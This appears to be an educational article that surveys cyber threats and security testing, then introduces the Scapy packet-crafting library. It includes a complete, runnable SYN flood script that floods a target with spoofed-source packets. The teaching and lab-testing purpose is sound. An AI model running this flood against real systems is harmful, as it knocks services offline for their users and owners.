Cyber attacks are on the rise. Scapy is a powerful and flexible packet crafting tool that lets defenders and testers see these attacks for what they are on the wire: it crafts, sends, sniffs and dissects the very packets the attacks are made of.
Cyber security is the set of principles and practices that protects computing assets such as computers, networks, databases, mobile devices and other equipment from attack. Almost every device is connected to a network today, and maintaining the confidentiality, integrity and availability of data is of utmost importance.
Confidentiality implies that data should be kept private: available only to authorised users, so that the risk of leakage is reduced. Many attacks aim simply to extract information from a system.
Integrity implies that data is protected from unauthorised modification or corruption. Attacks on integrity, for instance malware that tampers with files, undermine the trust that can be placed in a system.
Availability implies that data and systems are accessible to their users whenever they need them. Attacks on availability deliberately block access so that the system cannot perform its function.
Types of cyber threats
As indicated earlier, all the cyber threats attack the confidentiality, integrity and availability of data.
Malware attacks: Malware is malicious software created to attack the systems of the user to access information and corrupt the data. There are different types of malware such as viruses, Trojans, ransomware, spyware, botnets, etc. Malware basically affects the confidentiality and integrity of the asset.
Social engineering attacks: These manipulate people rather than software; the victim is talked or tricked into handing over access or information. Examples of social engineering attacks are:
- Phishing: A malicious actor sends a fraudulent email or link and obtains credentials or other information when the victim clicks the link, opens the attachment or replies.
- Spear phishing: Phishing tailored to a specific individual or organisation, using details about the target to make the lure convincing.
- Whaling (whale phishing): Spear phishing aimed at high-value targets such as senior executives.
Man in the middle attack: The malicious actor places themselves between the user and the system, so that the traffic flows through a point they control. They can then read confidential information from the traffic and may also alter it, so both confidentiality and integrity are at risk. Sniffing traffic on a shared or redirected network segment is one way this is done.
Denial of service attack: In this type of attack, the malicious actor prevents access to the system, and the computer or server is unable to perform its intended function. This makes the system unusable, affecting its availability.
SQL injection attack: SQL is the query language used to talk to relational databases. When an application builds SQL queries from user input without keeping code and data apart, an attacker can supply input that changes the meaning of the query and read, modify or delete data in the database.
Password attack: In this type of attack, the attacker tries to discover the passwords of user accounts. There are different types of password attacks.
- Dictionary attack: The attacker tries every word in a list of likely passwords (a 'dictionary') in an attempt to guess the password.
- Brute force attack: The attacker systematically tries possible character combinations until the password is found.
- Keylogger: Rather than guessing, this attack records everything typed on a computer or mobile keyboard and captures passwords as they are entered.
- Shoulder surfing: Passwords are obtained by watching over the user's shoulder as they type.
Distributed denial of service or DDoS attack: Here multiple compromised machines (bots) are used to perform a denial-of-service attack on the target. The attacker controls the bots and attacks the target through them, which makes the real source difficult to trace. There are different kinds of DDoS attacks, such as volume based attacks, protocol attacks (the SYN flood shown later is one) and application layer attacks.
Cyber security testing
Cyber security testing involves uncovering the vulnerabilities and making a risk assessment of the system for cyber attacks. The goal is to find the loopholes and weaknesses of the system.
There are different types of security testing.
Vulnerability scanning: This involves finding, usually with automated tools, the weaknesses through which an attacker could gain unauthorised access to a machine. Various parts of the system, such as open ports and the services and software versions behind them, are checked against known vulnerabilities.
Penetration testing: A pen test is an authorised, simulated attack on a system. It goes beyond scanning and actually tries to exploit the weaknesses found, to show what an attacker could achieve.
Security auditing: A systematic review of the system's configuration, policies and controls against a defined standard, to find security vulnerabilities and gaps.
Security risk assessment: In this kind of testing the risks and vulnerabilities in the system are analysed. This involves identifying the security loopholes in the system, analysing the vulnerabilities and addressing them. Past problems with the system are evaluated from the attacker's point of view.
Ethical hacking: Ethical hacking is a process of understanding the vulnerabilities in the system, the installed applications, the networking protocols used and the databases. It tries to understand the weak points in the system and attacks it with the owner's authorisation to evaluate and resolve its vulnerabilities.
Scapy: The network packet manipulation tool
Now that we know a little about the risks associated with the Internet, we will have a look at Scapy, a packet crafting library for Python. Current releases (2.5.0 onwards) require Python 3; the older 2.4.x series also supported Python 2.
Scapy is a powerful packet crafting tool. It can forge or decode packets of a wide variety of protocols, send them on the wire, capture the answers and match requests with their replies. It can be used to handle the classical tasks of cyber security such as network scanning, probing, unit tests, performing attacks, network discovery and debugging of network problems. Scapy can do the following:
- Network scanning
- Network attack
- Automated analysis of pcap files, such as captures saved from Wireshark or tcpdump
Cyber security activities
Port scanning: Ports are the doors to the network through which information is received and transmitted. Port scanning determines which ports are open and can receive information, and what services are available from that system.
Network fingerprinting: Network fingerprinting is the process of finding the information on the network device such as the version of the operating system, network protocols, active network services, databases installed, software applications and configuration, and so on. An attacker’s first activity is to find as much information as possible such as the target platform, software application, databases and configuration, network topology and architecture. This information can be used to find vulnerabilities and plan for the attack.
Packet sniffing: In this, hardware or software is used to observe the packets flowing through the network. This could be between two computers or multiple devices on the network. It is also called packet analysis or protocol analysis. Packet sniffers work by intercepting and logging the traffic on the network. The raw packets are analysed to decode their protocol information.
Packet forging: Packet forging is the manipulation of network packets sent to the devices. This is done to take advantage of the vulnerabilities in the software. In packet forging, the protocol header or payload information is manipulated and sent to the device.
After getting the necessary information through port scanning, fingerprinting, and understanding the vulnerabilities of the system, a cyber attack is carried out to disrupt and disable a system.
Advantages of Scapy over other tools
There are a lot of open source tools such as Nmap, Zenmap and Netcat available to perform a port scan. Vulnerability scanning can be done by open source tools such as OpenVAS, Metasploit, etc. Packet sniffing can be done by tools like Wireshark. But all these activities are also possible with Scapy.
Scapy is a tool with which you can craft your own packets, send them on the network, receive the responses and analyse them. Tools like Nmap are built around a fixed set of tasks and send a fixed set of packets; Scapy, being a packet crafting library, is far more flexible. With Scapy you can set any field of any layer to any value, including values a real host would never send, which is exactly what is needed to test how a system handles malformed or unexpected traffic. It is also possible to programmatically analyse the packets and extract the information that is required.
Downloading and installing Scapy
We can download Scapy from https://scapy.net/download/ or install it with pip. The following command installs Scapy together with IPython, which gives a more comfortable interactive shell:
$ pip install scapy[basic]
To install only Scapy (its interactive mode then uses the plain Python shell), type:
$ pip install scapy
If you want to install Scapy with all the optional dependencies (IPython, cryptography for the TLS layers, matplotlib and others), write the following:
$ pip install scapy[complete]
The --pre flag seen in some older instructions only lets pip pick a pre-release version and is not needed for a stable install. Sending and sniffing raw packets needs root (or administrator) privileges; on Windows, Scapy also needs Npcap.
Scapy interactive mode: In this mode, Scapy commands are typed at a prompt (run the scapy command in a terminal). This is just a Python interpreter with Scapy's classes and functions already loaded, and it is convenient for one-off experiments.
Importing Scapy as a module: In this mode, Scapy is imported into a Python program (from scapy.all import *). This is used for manipulating packets programmatically and for building reusable tools.
Cyber attacks using Scapy
The small program given below demonstrates a SYN flood attack using Scapy. It sends a stream of TCP SYN segments with random spoofed source addresses, so the target allocates a half-open connection for each one and never receives the final ACK. Run it only against a machine you own on an isolated lab network; it needs root privileges to send raw packets.
from scapy.all import IP, TCP, Raw, RandIP, RandShort, send

# IP address of the target under attack
ip_target = "192.168.1.11"
# Port of the target
port_target = 55555
# Spoof the source: a random address from the target's own /24 on every packet
ip = IP(src=RandIP("192.168.1.0/24"), dst=ip_target)
# Prepare the TCP SYN segment with a random source port
tcp = TCP(sport=RandShort(), dport=port_target, flags="S")
raw = Raw(b"X" * 1024)
# Stack up the layers
p = ip / tcp / raw
# Send the constructed packet in a loop until CTRL+C is pressed
send(p, loop=1, verbose=0)
Network scanning using Scapy module
The process of scanning the whole network to find all the clients connected to it is known as network scanning. We can identify clients by their IP and MAC addresses. An ARP ping (a broadcast who-has request for every address in the range) can be used to find the 'live' systems on the local network segment. Because ARP is not routed, it only reaches hosts in the same broadcast domain, but hosts answer it even when a firewall drops ICMP echo requests.
Scapy sits on top of libpcap or native raw sockets and exposes packets as Python objects, so you can capture and inspect traffic programmatically much as Wireshark lets you do in its GUI. With an understanding of the types of attacks and the ways to mitigate them, I leave it to you to try out Scapy and explore further use cases. For more details, visit https://scapy.net/ and read the documentation.